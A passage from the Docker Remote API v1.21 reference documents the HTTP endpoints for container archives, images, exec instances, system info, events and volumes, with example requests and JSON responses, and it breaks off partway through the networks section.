+} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.21/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.21/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.21/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.21/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.21/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.21/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.21/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.21/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.21/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.21/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.21/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.21/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.21/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.21/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "ClusterStore": "etcd://localhost:2379", + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.21/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.20", + "Experimental": false + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.21/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.21/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +**Example request**: + + GET /v1.21/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status":"pull","id":"busybox:latest","time":1442421700,"timeNano":1442421700598988358} + {"status":"create","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716853979870} + {"status":"attach","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716894759198} + {"status":"start","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716983607193} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.21/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.21/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.21/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.21/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.21/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.21/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Status" : "running", + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "EndpointID": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "" + } + } + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Mounts" : [] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.21/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.21/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). + +**Example request**: + + DELETE /v1.21/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 2.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.21/networks HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": 